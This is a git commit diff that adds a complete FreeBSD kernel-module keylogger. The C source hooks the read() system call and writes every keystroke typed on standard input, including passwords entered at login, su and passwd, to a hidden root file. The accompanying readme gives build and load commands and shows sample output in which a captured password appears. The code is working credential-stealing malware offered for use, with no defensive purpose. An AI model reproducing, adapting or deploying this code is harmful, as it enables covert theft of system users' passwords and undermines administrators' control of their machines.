added keylogger

2015-06-03 15:01:26 +02:00
parent 094b73988e
commit 8568c3f484
4 changed files with 204 additions and 0 deletions
--- a/keylog/Makefile
+++ b/keylog/Makefile
@@ -0,0 +1,4 @@
+SRCS=vnode_if.h keylog.c
+KMOD=keylog
+
+.include <bsd.kmod.mk>
--- a/keylog/keylog.c
+++ b/keylog/keylog.c
@@ -0,0 +1,149 @@
+/* 	simple read_hook sniffer for freebsd, collects passwords from:
+	login / su / passwd
+
+	ported to FreeBSD 9.3
+
+	Warning. While unloading the system is crashing *sometimes*, better do not unload ;)
+	by dash
+
+*/
+#include <sys/types.h>
+#include <sys/sysent.h>
+#include <sys/syscall.h>
+#include <sys/uio.h>
+#include <sys/syscallsubr.h>
+#include <sys/limits.h>
+#include <sys/param.h>
+#include <sys/module.h>
+#include <sys/kernel.h>
+#include <sys/systm.h>
+#include <sys/pcpu.h>
+#include <sys/proc.h>
+#include <sys/syscallsubr.h>
+#include <sys/fcntl.h>
+#include <sys/file.h>
+#include <sys/sysproto.h>
+
+// you might want to change this one
+#define LOGPATH "/.keylog.txt"
+
+static int keylog_write(struct thread *td, int fd, char *line, u_int len)
+{
+  struct uio auio;
+  struct iovec aiov;
+  int err;
+
+  bzero(&aiov, sizeof(aiov));
+  bzero(&auio, sizeof(auio));
+ 
+  aiov.iov_base = line;
+  aiov.iov_len = len;
+ 
+  auio.uio_iov = &aiov;
+  auio.uio_offset = 0;
+  auio.uio_segflg = UIO_SYSSPACE;
+  auio.uio_rw = UIO_WRITE;
+  auio.uio_iovcnt = 1;
+  auio.uio_resid = len;
+
+  auio.uio_td = td;
+
+  printf(aiov.iov_base);
+  err = kern_writev(td, fd, &auio);
+
+  return err;
+}
+
+
+static int keylog_close(struct thread *td, int fd)
+{
+  if(fd)
+  {
+	struct close_args fdtmp;
+	fdtmp.fd = fd;
+	return kern_close(td, fdtmp.fd);
+  }
+  return 0;
+}
+
+static int keylog_open(struct thread *td, int *fd, char *path)
+{
+  int error;
+  error = kern_open(td, path, UIO_SYSSPACE, O_WRONLY | O_CREAT | O_APPEND, 0644);
+  if (!error)
+  {
+	*fd = td->td_retval[0];
+  }
+  return error;
+}
+
+// read_hook for collecting the passwords
+static int read_hook(struct thread *td, void *syscall_args)
+{
+	struct read_args {
+		int fd;
+		void *buf;
+		size_t nbyte; } *uap;
+
+	uap = (struct read_args *)syscall_args;
+
+	int error;
+	char buf[1];
+	int done;
+	char string[64];
+	int fd = -1;
+
+	copyinstr(uap->buf,buf,1,&done);
+	error = sys_read(td, syscall_args);
+	
+	if (error || (!uap->nbyte) || (uap->nbyte >1) || (uap-> fd != 0))
+		return(error); 
+
+	copyinstr(uap->buf,buf,1,&done);
+
+	// open up file
+	keylog_open(curthread, &fd, LOGPATH);
+
+	// prepare string, processid, character and character decimal value
+	sprintf(string, "[%d]:%c(%d)\n", td->td_proc->p_pid, buf[0],buf[0]);
+	
+	// write data to filedescriptor
+	keylog_write(curthread, fd, string, strlen(string));
+
+	// close file
+	keylog_close(curthread, fd);
+
+	return(error);
+}
+
+static int load_handler(module_t mod, int what, void *arg)
+{
+		int err = 0;
+
+		switch(what)
+		{
+		case MOD_LOAD:
+			sysent[SYS_read].sy_call = (sy_call_t *)read_hook;
+			break;
+
+		case MOD_UNLOAD:
+			sysent[SYS_read].sy_call = (sy_call_t *)sys_read;
+			break;
+
+		default:
+			err = EINVAL;
+			break;
+		}
+
+		return(err);
+}
+
+// a struct that holds basic data on the module
+static moduledata_t keylog_mod =
+{
+		"schlussel",
+		load_handler,
+		NULL
+};
+
+DECLARE_MODULE(schlussel, keylog_mod, SI_SUB_KLD, SI_ORDER_ANY); 
--- a/keylog/readme.txt
+++ b/keylog/readme.txt
@@ -0,0 +1,48 @@
+keylog readme
+=============
+
+this module reads passwords entered via:
+- login
+- su
+- passwd
+
+and all other services using read() syscall.
+tested on FreeBSD 9.3, should also run on 10.1 and others.
+
+usage
+=====
+FreeBSD fbsd_default 9.3-RELEASE FreeBSD 9.3-RELEASE #0 r268512: Fri Jul 11 03:13:02 UTC 2014     root@snap.freebsd.org:/usr/obj/usr/src/sys/GENERIC  i386
+
+# make
+# kldload ./keylog.ko
+# kldstat
+Id Refs Address    Size     Name
+ 1    3 0xc0400000 1289f7c  kernel
+ 2    1 0xc49ad000 2000     keylog.ko
+
+
+# ls -al /.keylog.txt
+-rw-r--r--  1 root  wheel  809 Jun  2 22:59 /.keylog.txt
+
+(10)
+[1915]:p(112)
+[1915]:a(97)
+[1915]:s(115)
+[1915]:s(115)
+[1915]:w(119)
+[1915]:o(111)
+[1915]:r(114)
+[1915]:d(100)
+[1915]:
+(10)
+
+The logfile is organized as follows: [pid]:character(character as decimal value). In this case you can see
+that the entered password, called due the login binary with process id 1915 is: 'password'.
+
+If you want to change the path, go into the sourcecode and look for the variable LOGPATH.
+
+Warning. Unloading the module seams to leave the kernel in a unstable state, so do not unload it ;)
+
+Author
+------
+dash